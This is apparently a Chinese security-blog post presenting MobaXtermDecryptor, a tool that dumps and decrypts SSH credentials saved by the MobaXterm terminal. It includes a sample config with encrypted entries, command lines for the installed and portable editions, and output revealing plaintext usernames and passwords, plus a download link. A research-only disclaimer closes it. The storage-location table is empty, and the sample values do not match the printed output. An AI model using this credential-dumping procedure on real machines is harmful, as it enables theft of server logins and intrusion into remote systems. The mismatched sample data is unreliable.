1. 介绍
MobaXterm是一款专为Windows用户设计的强大终端软件,集成了SSH客户端、X11服务器、标签式界面、网络工具以及多种Unix命令集等功能于一身,是远程服务器管理、网络调试及软件开发的理想选择。
2. 用户数据存储位置
用户凭据存储的位置:
|
|
|
|
|
|---|---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
部分 MobaXterm.ini 内容示例:
[Misc]
SessionP=656078197542
MPSetAccount=Administrator
MPSetComputer=WIN-KC7O8UA7U4Q
[Credentials]
dev-user=root:hDkUY2nK
[Passwords]
mobauser@mobaserver=hnp+7YZCxO75h1e/w1tST2IvKHtWIIIRuKQ=
[Sesspass]
Administrator@WIN-Demo=AQAAALK+kjnRao9Fp9ljPL2GpQIAAAAAAgAAAAAAEGYAAAABAAAgAAAA8eEio3ElndSDHvad+IUTeuDcxECIp6BRTcnl4WUO0hQAAAAADoAAAAACAAAgAAAApYkVRexqVUB0W2aggCLirnpVr7XXvG4zkThBB5Cc34RgAAAAtuRBDfbxi9Ws5Fp7D2DAV12a/7+ZAC4Y8s6LryB0AmG6eByh2+ScguKs0nKsXupoHtQrq1esdbOF+KA5ObYKv7e9Cmb3X86HX90sRyaqRoi0faQ4BwL2EVFP3CAqNfVCQAAAAOIiPQ/546VgLw5vn2ptgn/ELHzOiGWwA7v9ov3Z0/POZrPXW+1jtb2PeGCkWyH82PDjx5c0UyO4j7xw/UzrDYE=
3. 使用方法
对于 MobaXterm 安装版本直接运行即可:
PS C:> .MobaXtermDecryptor.exe --debug
[14:48:54 INF] [+] Logger initialized with level: Debug
[14:48:54 INF] [+] Automatic mode
[14:48:55 DBG] [+] Searching for MobaXterm process:
[14:48:55 DBG] [+] Process Name: MobaXterm, Version: 24.2
[14:48:55 DBG] [+] Process ID: 2448, Path: C:Program Files (x86)MobatekMobaXtermMobaXterm.exe
[14:48:55 DBG] [-] MobaXterm.ini configuration file does not exist: C:Program Files (x86)MobatekMobaXtermMobaXterm.ini
[14:48:55 DBG] [+] Read information from the registry: HKEY_CURRENT_USERSoftwareMobatekMobaXterm
[14:48:55 INF] [+] MobaXterm Installer Edition
[14:48:55 INF] [+] MobaXterm Credentials:
[14:48:55 INF] [*] Name: dev-user
[14:48:55 INF] [*] Username: root
[14:48:55 INF] [*] Password: Admin123
[14:48:55 INF] [*]
[14:48:55 INF] [+] MobaXterm Passwords:
[14:48:55 INF] [*] ConnName: mobauser@mobaserver
[14:48:55 INF] [*] Password: 39214moba204877pass6472
[14:48:55 INF] [*]
对于 MobaXterm 便携版本需要指定 MobaXterm.ini 文件:
PS C:> .MobaXtermDecryptor.exe mobaxterm --debug c:UsersAdministratorDocumentsMobaXtermMobaXterm.ini
[14:38:32 INF] [+] Logger initialized with level: Debug
[14:38:32 INF] [+] Execute mobaxterm command
[14:38:33 INF] [+] MobaXterm.ini configuration file path: c:UsershonyDocumentsMobaXtermMobaXterm.ini
[14:38:33 INF] [+] MobaXterm Portable Edition
[14:38:33 INF] [+] MobaXterm Credentials:
[14:38:33 INF] [*] Name: dev-user
[14:38:33 INF] [*] Username: root
[14:38:33 INF] [*] Password: Admin123
[14:38:33 INF] [*]
[14:38:33 INF] [+] MobaXterm Passwords:
[14:38:33 INF] [*] ConnName: mobauser@mobaserver
[14:38:33 INF] [*] Password: 100374moba240717pass345585
[14:38:33 INF] [*]
★
注意:对于便携版也需要在目标机器上运行,因为有进行 DPAPI 解密操作。
4. 工具下载
https://github.com/h0ny/MobaXtermDecryptor
原文始发于微信公众号(SecretTeam安全团队):远程 SSH - MobaXterm 密码转储工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论